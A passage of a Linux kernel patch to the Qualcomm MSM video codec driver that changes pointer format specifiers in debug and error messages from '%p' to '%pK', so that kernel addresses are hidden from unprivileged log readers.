-@@ -1068,7 +1068,7 @@ int msm_vdec_reqbufs(struct msm_vidc_inst *inst, struct v4l2_requestbuffers *b)
- 
- 	if (!inst || !b) {
- 		dprintk(VIDC_ERR,
--			"Invalid input, inst = %p, buffer = %p\n", inst, b);
-+			"Invalid input, inst = %pK, buffer = %pK\n", inst, b);
- 		return -EINVAL;
- 	}
- 
-@@ -1098,7 +1098,7 @@ int msm_vdec_g_fmt(struct msm_vidc_inst *inst, struct v4l2_format *f)
- 
- 	if (!inst || !f || !inst->core || !inst->core->device) {
- 		dprintk(VIDC_ERR,
--			"Invalid input, inst = %p, format = %p\n", inst, f);
-+			"Invalid input, inst = %pK, format = %pK\n", inst, f);
- 		return -EINVAL;
- 	}
- 
-@@ -1545,7 +1545,7 @@ int msm_vdec_querycap(struct msm_vidc_inst *inst, struct v4l2_capability *cap)
- {
- 	if (!inst || !cap) {
- 		dprintk(VIDC_ERR,
--			"Invalid input, inst = %p, cap = %p\n", inst, cap);
-+			"Invalid input, inst = %pK, cap = %pK\n", inst, cap);
- 		return -EINVAL;
- 	}
- 	strlcpy(cap->driver, MSM_VIDC_DRV_NAME, sizeof(cap->driver));
-@@ -1565,7 +1565,7 @@ int msm_vdec_enum_fmt(struct msm_vidc_inst *inst, struct v4l2_fmtdesc *f)
- 	int rc = 0;
- 	if (!inst || !f) {
- 		dprintk(VIDC_ERR,
--			"Invalid input, inst = %p, f = %p\n", inst, f);
-+			"Invalid input, inst = %pK, f = %pK\n", inst, f);
- 		return -EINVAL;
- 	}
- 	if (f->type == V4L2_BUF_TYPE_VIDEO_CAPTURE_MPLANE) {
-@@ -1623,7 +1623,7 @@ static int msm_vdec_queue_setup(struct vb2_queue *q,
- 
- 	if (!q || !num_buffers || !num_planes
- 		|| !sizes || !q->drv_priv) {
--		dprintk(VIDC_ERR, "Invalid input, q = %p, %p, %p\n",
-+		dprintk(VIDC_ERR, "Invalid input, q = %pK, %pK, %pK\n",
- 			q, num_buffers, num_planes);
- 		return -EINVAL;
- 	}
-@@ -1903,7 +1903,7 @@ static inline int start_streaming(struct msm_vidc_inst *inst)
- 	rc = msm_comm_try_state(inst, MSM_VIDC_START_DONE);
- 	if (rc) {
- 		dprintk(VIDC_ERR,
--			"Failed to move inst: %p to start done state\n", inst);
-+			"Failed to move inst: %pK to start done state\n", inst);
- 		goto fail_start;
- 	}
- 	msm_dcvs_init_load(inst);
-@@ -1927,7 +1927,7 @@ static inline int stop_streaming(struct msm_vidc_inst *inst)
- 	rc = msm_comm_try_state(inst, MSM_VIDC_RELEASE_RESOURCES_DONE);
- 	if (rc)
- 		dprintk(VIDC_ERR,
--			"Failed to move inst: %p to start done state\n", inst);
-+			"Failed to move inst: %pK to start done state\n", inst);
- 	return rc;
- }
- 
-@@ -1937,7 +1937,7 @@ static int msm_vdec_start_streaming(struct vb2_queue *q, unsigned int count)
- 	int rc = 0;
- 	struct hfi_device *hdev;
- 	if (!q || !q->drv_priv) {
--		dprintk(VIDC_ERR, "Invalid input, q = %p\n", q);
-+		dprintk(VIDC_ERR, "Invalid input, q = %pK\n", q);
- 		return -EINVAL;
- 	}
- 	inst = q->drv_priv;
-@@ -1946,7 +1946,7 @@ static int msm_vdec_start_streaming(struct vb2_queue *q, unsigned int count)
- 		return -EINVAL;
- 	}
- 	hdev = inst->core->device;
--	dprintk(VIDC_DBG, "Streamon called on: %d capability for inst: %p\n",
-+	dprintk(VIDC_DBG, "Streamon called on: %d capability for inst: %pK\n",
- 		q->type, inst);
- 	switch (q->type) {
- 	case V4L2_BUF_TYPE_VIDEO_OUTPUT_MPLANE:
-@@ -1964,7 +1964,7 @@ static int msm_vdec_start_streaming(struct vb2_queue *q, unsigned int count)
- 	}
- 	if (rc) {
- 		dprintk(VIDC_ERR,
--			"Streamon failed on: %d capability for inst: %p\n",
-+			"Streamon failed on: %d capability for inst: %pK\n",
- 			q->type, inst);
- 		goto stream_start_failed;
- 	}
-@@ -1986,7 +1986,7 @@ static void msm_vdec_stop_streaming(struct vb2_queue *q)
- 	struct msm_vidc_inst *inst;
- 	int rc = 0;
- 	if (!q || !q->drv_priv) {
--		dprintk(VIDC_ERR, "Invalid input, q = %p\n", q);
-+		dprintk(VIDC_ERR, "Invalid input, q = %pK\n", q);
- 		return;
- 	}
- 
-@@ -2012,7 +2012,7 @@ static void msm_vdec_stop_streaming(struct vb2_queue *q)
- 
- 	if (rc)
- 		dprintk(VIDC_ERR,
--			"Failed to move inst: %p, cap = %d to state: %d\n",
-+			"Failed to move inst: %pK, cap = %d to state: %d\n",
- 			inst, q->type, MSM_VIDC_RELEASE_RESOURCES_DONE);
- }
- 
-@@ -2039,7 +2039,7 @@ int msm_vdec_inst_init(struct msm_vidc_inst *inst)
- {
- 	int rc = 0;
- 	if (!inst) {
--		dprintk(VIDC_ERR, "Invalid input = %p\n", inst);
-+		dprintk(VIDC_ERR, "Invalid input = %pK\n", inst);
- 		return -EINVAL;
- 	}
- 	inst->fmts[OUTPUT_PORT] = &vdec_formats[2];
-@@ -2767,7 +2767,7 @@ static int msm_vdec_op_s_ctrl(struct v4l2_ctrl *ctrl)
- 	rc = msm_comm_try_state(inst, MSM_VIDC_OPEN_DONE);
- 	if (rc) {
- 		dprintk(VIDC_ERR,
--			"Failed to move inst: %p to start done state\n", inst);
-+			"Failed to move inst: %pK to start done state\n", inst);
- 		goto failed_open_done;
- 	}
- 
-@@ -2796,7 +2796,7 @@ static int msm_vdec_op_g_volatile_ctrl(struct v4l2_ctrl *ctrl)
- 	rc = msm_comm_try_state(inst, MSM_VIDC_OPEN_DONE);
- 	if (rc) {
- 		dprintk(VIDC_ERR,
--			"Failed to move inst: %p to start done state\n", inst);
-+			"Failed to move inst: %pK to start done state\n", inst);
- 		goto failed_open_done;
- 	}
- 	for (c = 0; c < master->ncontrols; ++c) {
-diff --git a/drivers/media/platform/msm/vidc/msm_venc.c b/drivers/media/platform/msm/vidc/msm_venc.c
-index 2809d06..9589b57 100644
---- a/drivers/media/platform/msm/vidc/msm_venc.c
-+++ b/drivers/media/platform/msm/vidc/msm_venc.c
-@@ -1634,13 +1634,13 @@ static inline int msm_venc_power_save_mode_enable(struct msm_vidc_inst *inst)
- 				(void *)inst->session, prop_id, pdata);
- 		if (rc) {
- 			dprintk(VIDC_ERR,
--				"%s: Failed to set power save mode for inst: %p\n",
-+				"%s: Failed to set power save mode for inst: %pK\n",
- 				__func__, inst);
- 			goto fail_power_mode_set;
- 		}
- 		inst->flags |= VIDC_LOW_POWER;
- 		msm_dcvs_enc_set_power_save_mode(inst, true);
--		dprintk(VIDC_INFO, "Power Save Mode set for inst: %p\n", inst);
-+		dprintk(VIDC_INFO, "Power Save Mode set for inst: %pK\n", inst);
- 	}
- 
- fail_power_mode_set:
-@@ -1685,7 +1685,7 @@ static inline int start_streaming(struct msm_vidc_inst *inst)
- 	rc = msm_comm_try_state(inst, MSM_VIDC_START_DONE);
- 	if (rc) {
- 		dprintk(VIDC_ERR,
--			"Failed to move inst: %p to start done state\n", inst);
-+			"Failed to move inst: %pK to start done state\n", inst);
- 		goto fail_start;
- 	}
- 	msm_dcvs_init_load(inst);
-@@ -1699,11 +1699,11 @@ static int msm_venc_start_streaming(struct vb2_queue *q, unsigned int count)
- 	struct msm_vidc_inst *inst;
- 	int rc = 0;
- 	if (!q || !q->drv_priv) {
--		dprintk(VIDC_ERR, "Invalid input, q = %p\n", q);
-+		dprintk(VIDC_ERR, "Invalid input, q = %pK\n", q);
- 		return -EINVAL;
- 	}
- 	inst = q->drv_priv;
--	dprintk(VIDC_DBG, "Streamon called on: %d capability for inst: %p\n",
-+	dprintk(VIDC_DBG, "Streamon called on: %d capability for inst: %pK\n",
- 		q->type, inst);
- 	switch (q->type) {
- 	case V4L2_BUF_TYPE_VIDEO_OUTPUT_MPLANE:
-@@ -1721,7 +1721,7 @@ static int msm_venc_start_streaming(struct vb2_queue *q, unsigned int count)
- 	}
- 	if (rc) {
- 		dprintk(VIDC_ERR,
--			"Streamon failed on: %d capability for inst: %p\n",
-+			"Streamon failed on: %d capability for inst: %pK\n",
- 			q->type, inst);
- 		goto stream_start_failed;
- 	}
-@@ -1743,7 +1743,7 @@ static void msm_venc_stop_streaming(struct vb2_queue *q)
- 	struct msm_vidc_inst *inst;
- 	int rc = 0;
- 	if (!q || !q->drv_priv) {
--		dprintk(VIDC_ERR, "%s - Invalid input, q = %p\n", __func__, q);
-+		dprintk(VIDC_ERR, "%s - Invalid input, q = %pK\n", __func__, q);
- 		return;
- 	}
- 
-@@ -1765,7 +1765,7 @@ static void msm_venc_stop_streaming(struct vb2_queue *q)
- 
- 	if (rc)
- 		dprintk(VIDC_ERR,
--			"Failed to move inst: %p, cap = %d to state: %d\n",
-+			"Failed to move inst: %pK, cap = %d to state: %d\n",
- 			inst, q->type, MSM_VIDC_CLOSE_DONE);
- }
- 
-@@ -3271,7 +3271,7 @@ static int msm_venc_op_s_ctrl(struct v4l2_ctrl *ctrl)
- 
- 	if (rc) {
- 		dprintk(VIDC_ERR,
--			"Failed to move inst: %p to start done state\n", inst);
-+			"Failed to move inst: %pK to start done state\n", inst);
- 		goto failed_open_done;
- 	}
- 
-@@ -3315,7 +3315,7 @@ int msm_venc_inst_init(struct msm_vidc_inst *inst)
- {
- 	int rc = 0;
- 	if (!inst) {
--		dprintk(VIDC_ERR, "Invalid input = %p\n", inst);
-+		dprintk(VIDC_ERR, "Invalid input = %pK\n", inst);
- 		return -EINVAL;
- 	}
- 	inst->fmts[CAPTURE_PORT] = &venc_formats[4];
-@@ -3359,7 +3359,7 @@ int msm_venc_querycap(struct msm_vidc_inst *inst, struct v4l2_capability *cap)
- {
- 	if (!inst || !cap) {
- 		dprintk(VIDC_ERR,
--			"Invalid input, inst = %p, cap = %p\n", inst, cap);
-+			"Invalid input, inst = %pK, cap = %pK\n", inst, cap);
- 		return -EINVAL;
- 	}
- 	strlcpy(cap->driver, MSM_VIDC_DRV_NAME, sizeof(cap->driver));
-@@ -3379,7 +3379,7 @@ int msm_venc_enum_fmt(struct msm_vidc_inst *inst, struct v4l2_fmtdesc *f)
- 	int rc = 0;
- 	if (!inst || !f) {
- 		dprintk(VIDC_ERR,
--			"Invalid input, inst = %p, f = %p\n", inst, f);
-+			"Invalid input, inst = %pK, f = %pK\n", inst, f);
- 		return -EINVAL;
- 	}
- 	if (f->type == V4L2_BUF_TYPE_VIDEO_CAPTURE_MPLANE) {
-@@ -3436,7 +3436,7 @@ int msm_venc_s_fmt(struct msm_vidc_inst *inst, struct v4l2_format *f)
- 	struct hfi_device *hdev;
- 	if (!inst || !f) {
- 		dprintk(VIDC_ERR,
--			"Invalid input, inst = %p, format = %p\n", inst, f);
-+			"Invalid input, inst = %pK, format = %pK\n", inst, f);
- 		return -EINVAL;
- 	}
- 
-@@ -3583,7 +3583,7 @@ int msm_venc_g_fmt(struct msm_vidc_inst *inst, struct v4l2_format *f)
- 
- 	if (!inst || !f) {
- 		dprintk(VIDC_ERR,
--			"Invalid input, inst = %p, format = %p\n", inst, f);
-+			"Invalid input, inst = %pK, format = %pK\n", inst, f);
- 		return -EINVAL;
- 	}
- 
-@@ -3656,7 +3656,7 @@ int msm_venc_reqbufs(struct msm_vidc_inst *inst, struct v4l2_requestbuffers *b)
- 	int rc = 0;
- 	if (!inst || !b) {
- 		dprintk(VIDC_ERR,
--			"Invalid input, inst = %p, buffer = %p\n", inst, b);
-+			"Invalid input, inst = %pK, buffer = %pK\n", inst, b);
- 		return -EINVAL;
- 	}
- 	q = msm_comm_get_vb2q(inst, b->type);
-@@ -3693,7 +3693,7 @@ int msm_venc_prepare_buf(struct msm_vidc_inst *inst,
- 	if (inst->state == MSM_VIDC_CORE_INVALID ||
- 			inst->core->state == VIDC_CORE_INVALID) {
- 		dprintk(VIDC_ERR,
--			"Core %p in bad state, ignoring prepare buf\n",
-+			"Core %pK in bad state, ignoring prepare buf\n",
- 				inst->core);
- 		goto exit;
- 	}
-@@ -3764,7 +3764,7 @@ int msm_venc_release_buf(struct msm_vidc_inst *inst,
- 	rc = msm_comm_try_state(inst, MSM_VIDC_RELEASE_RESOURCES_DONE);
- 	if (rc) {
- 		dprintk(VIDC_ERR,
--			"Failed to move inst: %p to release res done state\n",
-+			"Failed to move inst: %pK to release res done state\n",
- 			inst);
- 		goto exit;
- 	}
-diff --git a/drivers/media/platform/msm/vidc/msm_vidc.c b/drivers/media/platform/msm/vidc/msm_vidc.c
-index 904ced9..7e186f6 100644
---- a/drivers/media/platform/msm/vidc/msm_vidc.c
-+++ b/drivers/media/platform/msm/vidc/msm_vidc.c
-@@ -285,7 +285,7 @@ struct buffer_info *device_to_uvaddr(struct msm_vidc_list *buf_list,
- 
- 	if (!buf_list || !device_addr) {
- 		dprintk(VIDC_ERR,
--			"Invalid input- device_addr: %pa buf_list: %p\n",
-+			"Invalid input- device_addr: %pa buf_list: %pK\n",
- 			&device_addr, buf_list);
- 		goto err_invalid_input;
- 	}
-@@ -425,7 +425,7 @@ int map_and_register_buf(struct msm_vidc_inst *inst, struct v4l2_buffer *b)
- 		goto exit;
- 	}
- 
--	dprintk(VIDC_DBG, "[MAP] Create binfo = %p fd = %d type = %d\n",
-+	dprintk(VIDC_DBG, "[MAP] Create binfo = %pK fd = %d type = %d\n",
- 			binfo, b->m.planes[0].reserved[0], b->type);
- 
- 	for (i = 0; i < b->length; ++i) {
-@@ -515,7 +515,7 @@ int map_and_register_buf(struct msm_vidc_inst *inst, struct v4l2_buffer *b)
- 				goto exit;
- 		}
- 		dprintk(VIDC_DBG,
--			"%s: [MAP] binfo = %p, handle[%d] = %p, device_addr = %pa, fd = %d, offset = %d, mapped = %d\n",
-+			"%s: [MAP] binfo = %pK, handle[%d] = %pK, device_addr = %pa, fd = %d, offset = %d, mapped = %d\n",
- 			__func__, binfo, i, binfo->handle[i],
- 			&binfo->device_addr[i], binfo->fd[i],
- 			binfo->buff_off[i], binfo->mapped[i]);
-@@ -538,7 +538,7 @@ int unmap_and_deregister_buf(struct msm_vidc_inst *inst,
- 	bool found = false, keep_node = false;
- 
- 	if (!inst || !binfo) {
--		dprintk(VIDC_ERR, "%s invalid param: %p %p\n",
-+		dprintk(VIDC_ERR, "%s invalid param: %pK %pK\n",
- 			__func__, inst, binfo);
- 		return -EINVAL;
- 	}
-@@ -568,7 +568,7 @@ int unmap_and_deregister_buf(struct msm_vidc_inst *inst,
- 
- 	for (i = 0; i < temp->num_planes; i++) {
- 		dprintk(VIDC_DBG,
--			"%s: [UNMAP] binfo = %p, handle[%d] = %p, device_addr = %pa, fd = %d, offset = %d, mapped = %d\n",
-+			"%s: [UNMAP] binfo = %pK, handle[%d] = %pK, device_addr = %pa, fd = %d, offset = %d, mapped = %d\n",
- 			__func__, temp, i, temp->handle[i],
- 			&temp->device_addr[i], temp->fd[i],
- 			temp->buff_off[i], temp->mapped[i]);
-@@ -597,12 +597,12 @@ int unmap_and_deregister_buf(struct msm_vidc_inst *inst,
- 		}
- 	}
- 	if (!keep_node) {
--		dprintk(VIDC_DBG, "[UNMAP] AND-FREED binfo: %p\n", temp);
-+		dprintk(VIDC_DBG, "[UNMAP] AND-FREED binfo: %pK\n", temp);
- 		list_del(&temp->list);
- 		kfree(temp);
- 	} else {
- 		temp->inactive = true;
--		dprintk(VIDC_DBG, "[UNMAP] NOT-FREED binfo: %p\n", temp);
-+		dprintk(VIDC_DBG, "[UNMAP] NOT-FREED binfo: %pK\n", temp);
- 	}
- exit:
- 	return 0;
-@@ -616,7 +616,7 @@ int qbuf_dynamic_buf(struct msm_vidc_inst *inst,
- 	struct v4l2_plane plane[VIDEO_MAX_PLANES] = { {0} };
- 
- 	if (!binfo) {
--		dprintk(VIDC_ERR, "%s invalid param: %p\n", __func__, binfo);
-+		dprintk(VIDC_ERR, "%s invalid param: %pK\n", __func__, binfo);
- 		return -EINVAL;
- 	}
- 	dprintk(VIDC_DBG, "%s fd[0] = %d\n", __func__, binfo->fd[0]);
-@@ -639,12 +639,12 @@ int output_buffer_cache_invalidate(struct msm_vidc_inst *inst,
- 	int rc = 0;
- 
- 	if (!inst) {
--		dprintk(VIDC_ERR, "%s: invalid inst: %p\n", __func__, inst);
-+		dprintk(VIDC_ERR, "%s: invalid inst: %pK\n", __func__, inst);
- 		return -EINVAL;
- 	}
- 
- 	if (!binfo) {
--		dprintk(VIDC_ERR, "%s: invalid buffer info: %p\n",
-+		dprintk(VIDC_ERR, "%s: invalid buffer info: %pK\n",
- 			__func__, inst);
- 		return -EINVAL;
- 	}
-@@ -720,7 +720,7 @@ int msm_vidc_release_buffers(void *instance, int buffer_type)
- 		rc = msm_comm_try_state(inst, MSM_VIDC_RELEASE_RESOURCES_DONE);
- 		if (rc) {
- 			dprintk(VIDC_ERR,
--					"Failed to move inst: %p to release res done\n",
-+					"Failed to move inst: %pK to release res done\n",
- 					inst);
- 		}
- 	}
-@@ -784,7 +784,7 @@ free_and_unmap:
- 			for (i = 0; i < bi->num_planes; i++) {
- 				if (bi->handle[i] && bi->mapped[i]) {
- 					dprintk(VIDC_DBG,
--						"%s: [UNMAP] binfo = %p, handle[%d] = %p, device_addr = %pa, fd = %d, offset = %d, mapped = %d\n",
-+						"%s: [UNMAP] binfo = %pK, handle[%d] = %pK, device_addr = %pa, fd = %d, offset = %d, mapped = %d\n",
- 						__func__, bi, i, bi->handle[i],
- 						&bi->device_addr[i], bi->fd[i],
- 						bi->buff_off[i], bi->mapped[i]);
-@@ -986,7 +986,7 @@ int msm_vidc_enum_framesizes(void *instance, struct v4l2_frmsizeenum *fsize)
- 	struct msm_vidc_capability *capability = NULL;
- 
- 	if (!inst || !fsize) {
--		dprintk(VIDC_ERR, "%s: invalid parameter: %p %p\n",
-+		dprintk(VIDC_ERR, "%s: invalid parameter: %pK %pK\n",
- 				__func__, inst, fsize);
- 		return -EINVAL;
- 	}
-@@ -1148,7 +1148,7 @@ void *msm_vidc_open(int core_id, int session_type)
- 		goto err_invalid_core;
- 	}
- 
--	pr_info(VIDC_DBG_TAG "Opening video instance: %p, %d\n",
-+	pr_info(VIDC_DBG_TAG "Opening video instance: %pK, %d\n",
- 		VIDC_MSG_PRIO2STRING(VIDC_INFO), inst, session_type);
- 	mutex_init(&inst->sync_lock);
- 	mutex_init(&inst->bufq[CAPTURE_PORT].lock);
-@@ -1314,7 +1314,7 @@ int msm_vidc_destroy(struct msm_vidc_inst *inst)
- 	for (i = 0; i < MAX_PORT_NUM; i++)
- 		vb2_queue_release(&inst->bufq[i].vb2_bufq);
- 
--	pr_info(VIDC_DBG_TAG "Closed video instance: %p\n",
-+	pr_info(VIDC_DBG_TAG "Closed video instance: %pK\n",
- 			VIDC_MSG_PRIO2STRING(VIDC_INFO), inst);
- 	kfree(inst);
- 	return 0;
-diff --git a/drivers/media/platform/msm/vidc/msm_vidc_common.c b/drivers/media/platform/msm/vidc/msm_vidc_common.c
-index 1eed94b..5a9e6d2 100644
---- a/drivers/media/platform/msm/vidc/msm_vidc_common.c
-+++ b/drivers/media/platform/msm/vidc/msm_vidc_common.c
-@@ -303,7 +303,7 @@ int msm_comm_get_inst_load(struct msm_vidc_inst *inst,
- 	if (is_non_realtime_session(inst) &&
- 		(quirks & LOAD_CALC_IGNORE_NON_REALTIME_LOAD)) {
- 		if (!inst->prop.fps) {
--			dprintk(VIDC_INFO, "instance:%p fps = 0\n", inst);
-+			dprintk(VIDC_INFO, "instance:%pK fps = 0\n", inst);
- 			load = 0;
- 		} else {
- 			load = msm_comm_get_mbs_per_sec(inst) / inst->prop.fps;
-@@ -322,7 +322,7 @@ int msm_comm_get_load(struct msm_vidc_core *core,
- 	int num_mbs_per_sec = 0;
- 
- 	if (!core) {
--		dprintk(VIDC_ERR, "Invalid args: %p\n", core);
-+		dprintk(VIDC_ERR, "Invalid args: %pK\n", core);
- 		return -EINVAL;
- 	}
- 
-@@ -451,13 +451,13 @@ static int msm_comm_vote_bus(struct msm_vidc_core *core)
- 	unsigned long core_freq = 0;
- 
- 	if (!core) {
--		dprintk(VIDC_ERR, "%s Invalid args: %p\n", __func__, core);
-+		dprintk(VIDC_ERR, "%s Invalid args: %pK\n", __func__, core);
- 		return -EINVAL;
- 	}
- 
- 	hdev = core->device;
- 	if (!hdev) {
--		dprintk(VIDC_ERR, "%s Invalid device handle: %p\n",
-+		dprintk(VIDC_ERR, "%s Invalid device handle: %pK\n",
- 			__func__, hdev);
- 		return -EINVAL;
- 	}
-@@ -569,7 +569,7 @@ const struct msm_vidc_format *msm_comm_get_pixel_fmt_index(
- {
- 	int i, k = 0;
- 	if (!fmt || index < 0) {
--		dprintk(VIDC_ERR, "Invalid inputs, fmt = %p, index = %d\n",
-+		dprintk(VIDC_ERR, "Invalid inputs, fmt = %pK, index = %d\n",
- 						fmt, index);
- 		return NULL;
- 	}
-@@ -591,7 +591,7 @@ struct msm_vidc_format *msm_comm_get_pixel_fmt_fourcc(
- {
- 	int i;
- 	if (!fmt) {
--		dprintk(VIDC_ERR, "Invalid inputs, fmt = %p\n", fmt);
-+		dprintk(VIDC_ERR, "Invalid inputs, fmt = %pK\n", fmt);
- 		return NULL;
- 	}
- 	for (i = 0; i < size; i++) {
-@@ -819,11 +819,11 @@ static void change_inst_state(struct msm_vidc_inst *inst,
- 	mutex_lock(&inst->lock);
- 	if (inst->state == MSM_VIDC_CORE_INVALID) {
- 		dprintk(VIDC_DBG,
--			"Inst: %p is in bad state can't change state to %d\n",
-+			"Inst: %pK is in bad state can't change state to %d\n",
- 			inst, state);
- 		goto exit;
- 	}
--	dprintk(VIDC_DBG, "Moved inst: %p from state: %d to state: %d\n",
-+	dprintk(VIDC_DBG, "Moved inst: %pK from state: %d to state: %d\n",
- 		   inst, inst->state, state);
- 	inst->state = state;
- exit:
-@@ -834,7 +834,7 @@ static int signal_session_msg_receipt(enum hal_command_response cmd,
- 		struct msm_vidc_inst *inst)
- {
- 	if (!inst) {
--		dprintk(VIDC_ERR, "Invalid(%p) instance id\n", inst);
-+		dprintk(VIDC_ERR, "Invalid(%pK) instance id\n", inst);
- 		return -EINVAL;
- 	}
- 	if (IS_HAL_SESSION_CMD(cmd)) {
-@@ -877,7 +877,7 @@ static int wait_for_state(struct msm_vidc_inst *inst,
- {
- 	int rc = 0;
- 	if (IS_ALREADY_IN_STATE(flipped_state, desired_state)) {
--		dprintk(VIDC_INFO, "inst: %p is already in state: %d\n",
-+		dprintk(VIDC_INFO, "inst: %pK is already in state: %d\n",
- 						inst, inst->state);
- 		goto err_same_state;
- 	}
-@@ -1083,7 +1083,7 @@ static void handle_event_change(enum hal_command_response cmd, void *data)
- 		struct buffer_info *binfo = NULL, *temp = NULL;
- 		u32 *ptr = NULL;
- 
--		dprintk(VIDC_DBG, "%s - inst: %p buffer: %pa extra: %pa\n",
-+		dprintk(VIDC_DBG, "%s - inst: %pK buffer: %pa extra: %pa\n",
- 				__func__, inst, &event_notify->packet_buffer,
- 				&event_notify->extra_data_buffer);
- 
-@@ -1479,11 +1479,11 @@ static void handle_session_error(enum hal_command_response cmd, void *data)
- 	}
- 
- 	hdev = inst->core->device;
--	dprintk(VIDC_WARN, "Session error received for session %p\n", inst);
-+	dprintk(VIDC_WARN, "Session error received for session %pK\n", inst);
- 	change_inst_state(inst, MSM_VIDC_CORE_INVALID);
- 
- 	if (response->status == VIDC_ERR_MAX_CLIENTS) {
--		dprintk(VIDC_WARN, "Too many clients, rejecting %p", inst);
-+		dprintk(VIDC_WARN, "Too many clients, rejecting %pK", inst);
- 		event = V4L2_EVENT_MSM_VIDC_MAX_CLIENTS;
- 
- 		/*
-@@ -1495,10 +1495,10 @@ static void handle_session_error(enum hal_command_response cmd, void *data)
- 
- 		msm_comm_session_clean(inst);
- 	} else if (response->status == VIDC_ERR_NOT_SUPPORTED) {
--		dprintk(VIDC_WARN, "Unsupported bitstream in %p", inst);
-+		dprintk(VIDC_WARN, "Unsupported bitstream in %pK", inst);
- 		event = V4L2_EVENT_MSM_VIDC_HW_UNSUPPORTED;
- 	} else {
--		dprintk(VIDC_WARN, "Unknown session error (%d) for %p\n",
-+		dprintk(VIDC_WARN, "Unknown session error (%d) for %pK\n",
- 				response->status, inst);
- 		event = V4L2_EVENT_MSM_VIDC_SYS_ERROR;
- 	}
-@@ -1515,7 +1515,7 @@ static void msm_comm_clean_notify_client(struct msm_vidc_core *core)
- 		return;
- 	}
- 
--	dprintk(VIDC_WARN, "%s: Core %p\n", __func__, core);
-+	dprintk(VIDC_WARN, "%s: Core %pK\n", __func__, core);
- 	mutex_lock(&core->lock);
- 	core->state = VIDC_CORE_INVALID;
- 
-@@ -1524,7 +1524,7 @@ static void msm_comm_clean_notify_client(struct msm_vidc_core *core)
- 		inst->state = MSM_VIDC_CORE_INVALID;
- 		mutex_unlock(&inst->lock);
- 		dprintk(VIDC_WARN,
--			"%s Send sys error for inst %p\n", __func__, inst);
-+			"%s Send sys error for inst %pK\n", __func__, inst);
- 		msm_vidc_queue_v4l2_event(inst,
- 				V4L2_EVENT_MSM_VIDC_SYS_ERROR);
- 	}
-@@ -1552,7 +1552,7 @@ static void handle_sys_error(enum hal_command_response cmd, void *data)
- 		return;
- 	}
- 
--	dprintk(VIDC_WARN, "SYS_ERROR %d received for core %p\n", cmd, core);
-+	dprintk(VIDC_WARN, "SYS_ERROR %d received for core %pK\n", cmd, core);
- 	msm_comm_clean_notify_client(core);
- 
- 	hdev = core->device;
-@@ -1584,12 +1584,12 @@ void msm_comm_session_clean(struct msm_vidc_inst *inst)
- 	hdev = inst->core->device;
- 	mutex_lock(&inst->lock);
- 	if (hdev && inst->session) {
--		dprintk(VIDC_DBG, "cleaning up instance: %p\n", inst);
-+		dprintk(VIDC_DBG, "cleaning up instance: %pK\n", inst);
- 		rc = call_hfi_op(hdev, session_clean,
- 				(void *)inst->session);
- 		if (rc) {
- 			dprintk(VIDC_ERR,
--				"Session clean failed :%p\n", inst);
-+				"Session clean failed :%pK\n", inst);
- 		}
- 		inst->session = NULL;
- 	}
-@@ -2003,7 +2003,7 @@ static void handle_fbd(enum hal_command_response cmd, void *data)
- 
- 		if (extra_idx && extra_idx < VIDEO_MAX_PLANES) {
- 			dprintk(VIDC_DBG,
--				"extradata: userptr = %p;"
-+				"extradata: userptr = %pK;"
- 				" bytesused = %d; length = %d\n",
- 				(u8 *)vb->v4l2_planes[extra_idx].m.userptr,
- 				vb->v4l2_planes[extra_idx].bytesused,
-@@ -2159,13 +2159,13 @@ int msm_comm_scale_clocks_load(struct msm_vidc_core *core,
- 	int codec = 0;
- 
- 	if (!core) {
--		dprintk(VIDC_ERR, "%s Invalid args: %p\n", __func__, core);
-+		dprintk(VIDC_ERR, "%s Invalid args: %pK\n", __func__, core);
- 		return -EINVAL;
- 	}
- 
- 	hdev = core->device;
- 	if (!hdev) {
--		dprintk(VIDC_ERR, "%s Invalid device handle: %p\n",
-+		dprintk(VIDC_ERR, "%s Invalid device handle: %pK\n",
- 			__func__, hdev);
- 		return -EINVAL;
- 	}
-@@ -2339,7 +2339,7 @@ static int msm_comm_session_abort(struct msm_vidc_inst *inst)
- 			msecs_to_jiffies(msm_vidc_hw_rsp_timeout));
- 	if (!rc) {
- 		dprintk(VIDC_ERR,
--				"%s: Wait interrupted or timed out [%p]: %d\n",
-+				"%s: Wait interrupted or timed out [%pK]: %d\n",
- 				__func__, inst, abort_completion);
- 		BUG_ON(msm_vidc_debug_timeout);
- 		rc = -EBUSY;
-@@ -2367,7 +2367,7 @@ static void handle_thermal_event(struct msm_vidc_core *core)
- 		mutex_unlock(&core->lock);
- 		if (inst->state >= MSM_VIDC_OPEN_DONE &&
- 			inst->state < MSM_VIDC_CLOSE_DONE) {
--			dprintk(VIDC_WARN, "%s: abort inst %p\n",
-+			dprintk(VIDC_WARN, "%s: abort inst %pK\n",
- 				__func__, inst);
- 			rc = msm_comm_session_abort(inst);
- 			if (rc) {
-@@ -2378,7 +2378,7 @@ static void handle_thermal_event(struct msm_vidc_core *core)
- 			}
- 			change_inst_state(inst, MSM_VIDC_CORE_INVALID);
- 			dprintk(VIDC_WARN,
--				"%s Send sys error for inst %p\n",
-+				"%s Send sys error for inst %pK\n",
- 				__func__, inst);
- 			msm_vidc_queue_v4l2_event(inst,
- 					V4L2_EVENT_MSM_VIDC_SYS_ERROR);
-@@ -2578,7 +2578,7 @@ static int msm_comm_session_init(int flipped_state,
- 	hdev = inst->core->device;
- 
- 	if (IS_ALREADY_IN_STATE(flipped_state, MSM_VIDC_OPEN)) {
--		dprintk(VIDC_INFO, "inst: %p is already in state: %d\n",
-+		dprintk(VIDC_INFO, "inst: %pK is already in state: %d\n",
- 						inst, inst->state);
- 		goto exit;
- 	}
-@@ -2600,7 +2600,7 @@ static int msm_comm_session_init(int flipped_state,
- 
- 	if (rc || !inst->session) {
- 		dprintk(VIDC_ERR,
--			"Failed to call session init for: %p, %p, %d, %d\n",
-+			"Failed to call session init for: %pK, %pK, %d, %d\n",
- 			inst->core->device, inst,
- 			inst->session_type, fourcc);
- 		rc = -EINVAL;
-@@ -2689,7 +2689,7 @@ static int msm_vidc_load_resources(int flipped_state,
- 
- 	hdev = core->device;
- 	if (IS_ALREADY_IN_STATE(flipped_state, MSM_VIDC_LOAD_RESOURCES)) {
--		dprintk(VIDC_INFO, "inst: %p is already in state: %d\n",
-+		dprintk(VIDC_INFO, "inst: %pK is already in state: %d\n",
- 						inst, inst->state);
- 		goto exit;
- 	}
-@@ -2725,7 +2725,7 @@ static int msm_vidc_start(int flipped_state, struct msm_vidc_inst *inst)
- 
- 	if (IS_ALREADY_IN_STATE(flipped_state, MSM_VIDC_START)) {
- 		dprintk(VIDC_INFO,
--			"inst: %p is already in state: %d\n",
-+			"inst: %pK is already in state: %d\n",
